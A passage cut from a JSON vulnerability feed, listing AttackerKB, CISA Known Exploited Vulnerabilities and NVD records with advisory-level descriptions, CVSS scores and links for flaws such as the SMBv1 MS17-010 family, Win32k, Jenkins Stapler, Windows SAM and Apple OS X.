"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:35:42", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0146", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "href": "https://attackerkb.com/topics/DPN51hmEne/cve-2017-0146", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:35:07", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0148", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "href": "https://attackerkb.com/topics/N7nzZYYXHW/cve-2017-0148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:37:13", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0144 (MS17-010)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-27T21:14:17", "description": "The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \u201cWin32k Elevation of Privilege Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:11am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0263", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2021-07-27T00:00:00", "id": "AKB:FD8F3671-7E1D-4B44-B0A0-D4BBEA6DA814", "href": "https://attackerkb.com/topics/vtnaonG5oN/cve-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T02:18:11", "description": "The XPC implementation in Admin Framework in Apple OS X before 10.10.3 allows local users to bypass authentication and obtain admin privileges via unspecified vectors.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2015-1130", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2020-07-30T00:00:00", "id": "AKB:2667139A-86E4-412A-BB06-C85E8DDEF95F", "href": "https://attackerkb.com/topics/DiGQgeYWcy/cve-2015-1130", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Jenkins Stapler Web Framework Deserialization of Untrusted Data Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2018-1000861", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:17:33", "description": "If a Volume Shadow Copy (VSS) shadow copy of the system drive is available, users can read the SAM file which would allow any user to escalate privileges to SYSTEM level.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows SAM Local Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2021-36934", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T11:17:53", "description": "Heap-based buffer overflow in IOHIDFamily in Apple OS X, which affects, iOS before 8 and Apple TV before 7, allows attackers to execute arbitrary code in a privileged context.", "cvss3": {}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Apple OS X Heap-Based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2014-4404", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T03:17:55", "description": "D-Link DIR-645 Wired/Wireless Router allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.", "cvss3": {}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "D-Link DIR-645 Router Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2051"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2015-2051", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Windows Shell in multiple versions of Microsoft Windows allows local users or remote attackers to execute arbitrary code via a crafted .LNK file", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Shell (.lnk) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-8464", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Oracle Corporation WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-10271", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-26T15:21:56", "description": "The Fileserver web application in Apache ActiveMQ allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Apache ActiveMQ Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2016-3088", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-28T03:17:55", "description": "Microsoft HTTP protocol stack (HTTP.sys) contains a vulnerability which allows for remote code execution.", "cvss3": {}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft HTTP.sys Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2015-1635", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "A remote code execution vulnerability exists in Microsoft Office.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0262"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-0262", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Win32k contains a privilege escalation vulnerability due to the Windows kernel-mode driver failing to properly handle objects in memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-0263", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T03:17:55", "description": "The XPC implementation in Admin Framework in Apple OS X before 10.10.3 allows local users to bypass authentication and obtain admin privileges.", "cvss3": {}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Apple OS X Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2015-1130", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:22:25", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-10T14:29:00", "type": "cve", "title": "CVE-2018-1000861", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2022-06-13T19:00:00", "cpe": ["cpe:/a:redhat:openshift_container_platform:3.11", "cpe:/a:jenkins:jenkins:2.153", "cpe:/a:jenkins:jenkins:2.138.3"], "id": "CVE-2018-1000861", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000861", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.153:*:*:*:-:*:*:*", "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.138.3:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-05-23T15:35:37", "description": "Windows Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:15:00", "type": "cve", "title": "CVE-2021-36934", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-36934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36934", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T10:14:33", "description": "Heap-based buffer overflow in IOHIDFamily in Apple iOS before 8 and Apple TV before 7 allows attackers to execute arbitrary code in a privileged context via an application that provides crafted key-mapping properties.", "cvss3": {}, "published": "2014-09-18T10:55:00", "type": "cve", "title": "CVE-2014-4404", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 